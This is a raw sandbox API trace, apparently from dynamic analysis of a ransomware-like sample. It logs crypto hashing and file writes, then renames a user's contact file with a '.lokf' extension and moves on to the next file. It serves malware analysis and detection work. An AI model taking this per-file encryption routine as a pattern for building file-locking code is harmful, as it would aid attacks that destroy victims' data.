1 [0058.377] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0058.377] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0058.377] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0058.377] GetLastError () returned 0x0 [0058.377] SetLastError (dwErrCode=0x0) [0058.377] GetLastError () returned 0x0 [0058.377] SetLastError (dwErrCode=0x0) [0058.377] GetLastError () returned 0x0 [0058.377] SetLastError (dwErrCode=0x0) [0058.377] GetLastError () returned 0x0 [0058.377] SetLastError (dwErrCode=0x0) [0058.377] GetLastError () returned 0x0 [0058.377] SetLastError (dwErrCode=0x0) [0058.377] GetLastError () returned 0x0 [0058.377] SetLastError (dwErrCode=0x0) [0058.377] GetLastError () returned 0x0 [0058.377] SetLastError (dwErrCode=0x0) [0058.377] GetLastError () returned 0x0 [0058.377] SetLastError (dwErrCode=0x0) [0058.377] GetLastError () returned 0x0 [0058.377] SetLastError (dwErrCode=0x0) [0058.377] GetLastError () returned 0x0 [0058.377] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.378] SetLastError (dwErrCode=0x0) [0058.378] GetLastError () returned 0x0 [0058.379] SetLastError (dwErrCode=0x0) [0058.379] GetLastError () returned 0x0 [0058.379] SetLastError (dwErrCode=0x0) [0058.379] GetLastError () returned 0x0 [0058.379] SetLastError (dwErrCode=0x0) [0058.379] GetLastError () returned 0x0 [0058.379] SetLastError (dwErrCode=0x0) [0058.379] GetLastError () returned 0x0 [0058.379] SetLastError (dwErrCode=0x0) [0058.379] GetLastError () returned 0x0 [0058.379] SetLastError (dwErrCode=0x0) [0058.379] GetLastError () returned 0x0 [0058.379] SetLastError (dwErrCode=0x0) [0058.379] GetLastError () returned 0x0 [0058.379] SetLastError (dwErrCode=0x0) [0058.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.379] CryptDestroyHash (hHash=0x327cb80) returned 1 [0058.379] CryptReleaseContext (hProv=0x6b89c8, dwFlags=0x0) returned 1 [0058.379] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0058.379] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0058.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.379] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0058.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4a0) returned 0x32947b0 [0058.379] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0058.379] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0058.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0058.379] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x3298530 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f370 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x32987b8 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2b0 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x326f2c8 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x3292fe8 [0058.380] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x3292fe8, Size=0x218) returned 0x3294c58 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0058.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2c8 | out: hHeap=0x660000) returned 1 [0058.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0058.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278ec0 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6ad10 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0058.380] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0058.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.380] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0058.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294c58 | out: hHeap=0x660000) returned 1 [0058.381] GetCurrentThreadId () returned 0x9e0 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326a688 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x6c1df0 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3234418 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.381] GetCurrentThreadId () returned 0x9e0 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0058.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0058.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3292fe8 [0058.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261058 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3282810 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.381] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0058.381] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac68 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ace0 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ae00 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac50 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ac20 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac50 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.382] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0058.382] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x3294c58 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3294e70 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x3297a68 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.383] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x3296fa8 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3292fe8 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296fa8 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294c58 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3294e70 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac20 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ae00 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ace0 | out: hHeap=0x660000) returned 1 [0058.383] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f2b0 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32987b8 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3282810 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.384] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x491, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb14*=0x491, lpOverlapped=0x0) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.384] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x496, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.384] WriteFile (in: hFile=0x5cc, lpBuffer=0x326a688*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326a688*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.384] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.384] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.384] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.385] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.385] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.385] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.385] CloseHandle (hObject=0x5cc) returned 1 [0058.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b89c8 [0058.385] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x890) returned 0x3268798 [0058.385] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b89c8 | out: hHeap=0x660000) returned 1 [0058.385] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\lulcit amkdfe.contact.lokf")) returned 1 [0058.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.386] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.386] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.387] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8a50 | out: hHeap=0x660000) returned 1 [0058.387] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0058.387] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.387] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0058.387] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.387] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned=".contact" [0058.387] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\sikvnb huvuib.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.388] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=1172) returned 1 [0058.388] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.390] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x46e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.390] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0058.391] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0058.391] HeapFree (in: 